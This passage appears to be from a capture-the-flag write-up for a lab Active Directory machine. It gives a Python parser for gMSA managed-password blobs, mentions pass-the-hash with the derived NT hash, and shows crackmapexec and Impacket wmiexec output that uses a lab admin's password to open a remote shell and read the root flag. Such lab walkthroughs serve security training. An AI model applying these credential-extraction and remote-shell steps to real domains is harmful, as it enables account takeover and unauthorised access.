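What ConvertFrom-ADManagedPasswordBlob does, as an added example that is not the post's code and does not need DSInternals: a parser for the MSDS-MANAGEDPASSWORD_BLOB structure (MS-ADTS 2.2.19) that the msDS-ManagedPassword attribute returns. The blob it builds for itself is constructed; a real one would be fetched over LDAP by a principal holding ReadGMSAPassword.

```python
import struct
from datetime import timedelta

# MSDS-MANAGEDPASSWORD_BLOB header (MS-ADTS 2.2.19), all little-endian:
# Version, Reserved, Length, CurrentPasswordOffset, PreviousPasswordOffset,
# QueryPasswordIntervalOffset, UnchangedPasswordIntervalOffset
HEADER = struct.Struct("<HHIHHHH")
TICKS_PER_SECOND = 10_000_000        # the two intervals are in 100-ns units


def _utf16z(buf: bytes, off: int) -> str:
    """Read a null-terminated UTF-16LE string starting at off."""
    end = off
    while end + 2 <= len(buf) and buf[end:end + 2] != b"\x00\x00":
        end += 2
    return buf[off:end].decode("utf-16-le")


def parse_managed_password(blob: bytes) -> dict:
    """Decode the blob into the same fields DSInternals prints."""
    version, _reserved, length, cur_off, prev_off, q_off, u_off = HEADER.unpack_from(blob, 0)
    if version != 1 or length != len(blob):
        raise ValueError("not a MSDS-MANAGEDPASSWORD_BLOB")
    q_ticks, = struct.unpack_from("<Q", blob, q_off)
    u_ticks, = struct.unpack_from("<Q", blob, u_off)
    return {
        "CurrentPassword": _utf16z(blob, cur_off),
        "PreviousPassword": _utf16z(blob, prev_off) if prev_off else None,
        "QueryPasswordInterval": timedelta(seconds=q_ticks / TICKS_PER_SECOND),
        "UnchangedPasswordInterval": timedelta(seconds=u_ticks / TICKS_PER_SECOND),
    }


def build_blob(current: str, previous: str = "", query_s: int = 0, unchanged_s: int = 0) -> bytes:
    """Constructed blob laid out as the DC would return it (for offline testing)."""
    cur = current.encode("utf-16-le") + b"\x00\x00"
    prev = previous.encode("utf-16-le") + b"\x00\x00" if previous else b""
    body = cur + prev
    body += b"\x00" * ((-len(body)) % 8)          # AlignmentPadding before the intervals
    cur_off = HEADER.size
    prev_off = cur_off + len(cur) if previous else 0
    q_off = cur_off + len(body)
    u_off = q_off + 8
    intervals = struct.pack("<QQ", query_s * TICKS_PER_SECOND, unchanged_s * TICKS_PER_SECOND)
    length = HEADER.size + len(body) + len(intervals)
    return HEADER.pack(1, 0, length, cur_off, prev_off, q_off, u_off) + body + intervals


if __name__ == "__main__":
    # Constructed sample: a gMSA password is random UTF-16 code units, so it
    # prints as CJK-looking garbage just like the transcript above.
    sample = build_blob("\uaa8c\u7d78\u7994Abc", query_s=2876 * 86400, unchanged_s=2876 * 86400)
    for key, value in parse_managed_password(sample).items():
        print(f"{key:26}: {value}")
```

The CurrentPassword string is what goes into the PSCredential above; its NT hash is MD4 over those same UTF-16LE bytes (without the terminator), which is why tools can also pass-the-hash as the gMSA instead of handling the unprintable plaintext.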
>> crackmapexec smb 10.10.11.129 -u tristan.davies -p 'whoamiWHOAMI!'
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [+] search.htb\tristan.davies:whoamiWHOAMI! (Pwn3d!)
>> wmiexec.py 'search/tristan.davies:whoamiWHOAMI!@10.10.11.129'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
search\tristan.davies
C:\Users\Administrator\desktop>type root.txt
acb........................................